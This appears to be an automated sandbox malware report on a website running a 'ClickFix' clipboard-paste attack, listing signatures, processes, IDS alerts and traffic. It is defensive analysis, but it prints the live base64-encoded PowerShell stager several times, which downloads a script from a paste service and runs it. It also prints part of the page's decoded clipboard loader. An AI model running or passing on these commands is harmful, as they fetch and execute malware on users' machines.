Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://www.thearchiterra.gr/

Overview

General Information

Sample URL:http://www.thearchiterra.gr/
Analysis ID:1545984
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
AI detected landing page (webpage, office document or email)
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Uses ipconfig to lookup or modify the Windows network settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1980,i,4396760410683812038,16617710152799470226,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.thearchiterra.gr/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • powershell.exe (PID: 6044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 2576 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • powershell.exe (PID: 3368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
    C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6044, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=", ProcessId: 3368, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6044, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=", ProcessId: 3368, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6044, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=", ProcessId: 3368, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5728, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 6044, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-31T11:05:45.214112+010020567401Exploit Kit Activity Detected192.168.2.16555081.1.1.153UDP
      2024-10-31T11:05:45.214112+010020567401Exploit Kit Activity Detected192.168.2.16649531.1.1.153UDP
      2024-10-31T11:05:45.214112+010020567401Exploit Kit Activity Detected192.168.2.16555081.1.1.153UDP
      2024-10-31T11:05:45.214112+010020567401Exploit Kit Activity Detected192.168.2.16649531.1.1.153UDP
      2024-10-31T11:05:45.515359+010020567401Exploit Kit Activity Detected192.168.2.16605441.1.1.153UDP
      2024-10-31T11:05:45.515359+010020567401Exploit Kit Activity Detected192.168.2.16605441.1.1.153UDP
      2024-10-31T11:05:45.515617+010020567401Exploit Kit Activity Detected192.168.2.16636981.1.1.153UDP
      2024-10-31T11:05:45.515617+010020567401Exploit Kit Activity Detected192.168.2.16636981.1.1.153UDP
      2024-10-31T11:05:48.739146+010020567401Exploit Kit Activity Detected192.168.2.16614331.1.1.153UDP
      2024-10-31T11:05:48.739146+010020567401Exploit Kit Activity Detected192.168.2.16614331.1.1.153UDP
      2024-10-31T11:05:48.739453+010020567401Exploit Kit Activity Detected192.168.2.16640571.1.1.153UDP
      2024-10-31T11:05:48.739453+010020567401Exploit Kit Activity Detected192.168.2.16640571.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-31T11:05:46.195288+010020567411Exploit Kit Activity Detected192.168.2.1649867188.114.96.3443TCP
      2024-10-31T11:05:46.195288+010020567411Exploit Kit Activity Detected192.168.2.1649867188.114.96.3443TCP
      2024-10-31T11:05:47.450221+010020567411Exploit Kit Activity Detected192.168.2.1649874188.114.96.3443TCP
      2024-10-31T11:05:47.450221+010020567411Exploit Kit Activity Detected192.168.2.1649874188.114.96.3443TCP
      2024-10-31T11:05:49.356024+010020567411Exploit Kit Activity Detected192.168.2.1649878188.114.96.3443TCP
      2024-10-31T11:05:49.356024+010020567411Exploit Kit Activity Detected192.168.2.1649878188.114.96.3443TCP

      Click to jump to signature section

      Show All Signature Results
      Source: https://thearchiterra.gr/HTTP Parser: Base64 decoded: ipconfig /flushdns$Diagnostics = "U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==";$MUI = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Diagnostics));Invoke-Expression $MUI;[System.Diagnostics.Process]::Start("powershell", "-ep Rem...
      Source: https://cdnjs.cloudflare.com/ajax/libs/ethers/6.13.1/ethers.umd.min.jsHTTP Parser: const __$g=typeof globalthis!=="undefined"?globalthis:typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof self!=="undefined"?self:{};(function(global,factory){typeof exports==="object"&&typeof module!=="undefined"?factory(exports):typeof define==="function"&&define.amd?define(["exports"],factory):(global=typeof globalthis!=="undefined"?globalthis:global||self,factory(global.ethers={}))})(this,function(exports){"use strict";const version="6.13.1";function checktype(value,type,name){const types=type.split("|").map(t=>t.trim());for(let i=0;i<types.length;i++){switch(type){case"any":return;case"bigint":case"boolean":case"number":case"string":if(typeof value===type){return}}}const error=new error(`invalid value for type ${type}`);error.code="invalid_argument";error.argument=`value.${name}`;error.value=value;throw error}async function resolveproperties(value){const keys=object.keys(value);const results=await promise.all(keys.map(k=>promise.resolve(value[k])));return results.reduce((accum,v,...
      Source: https://thearchiterra.gr/HTTP Parser: No favicon
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49706 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49882 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49883 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49884 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49885 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49886 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49888 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49889 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49887 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49892 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49894 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49895 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49896 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49900 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49901 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 150.171.85.254:443 -> 192.168.2.16:49904 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.213.254:443 -> 192.168.2.16:49906 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.16:49907 version: TLS 1.2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2056740 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (dareka4te .shop) : 192.168.2.16:55508 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056740 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (dareka4te .shop) : 192.168.2.16:64953 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056740 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (dareka4te .shop) : 192.168.2.16:60544 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056740 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (dareka4te .shop) : 192.168.2.16:63698 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056741 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in TLS SNI (dareka4te .shop) : 192.168.2.16:49867 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2056741 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in TLS SNI (dareka4te .shop) : 192.168.2.16:49874 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2056740 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (dareka4te .shop) : 192.168.2.16:61433 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056740 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (dareka4te .shop) : 192.168.2.16:64057 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056741 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in TLS SNI (dareka4te .shop) : 192.168.2.16:49878 -> 188.114.96.3:443
      Source: unknownDNS query: name: rentry.co
      Source: unknownDNS query: name: rentry.co
      Source: unknownDNS query: name: rentry.co
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
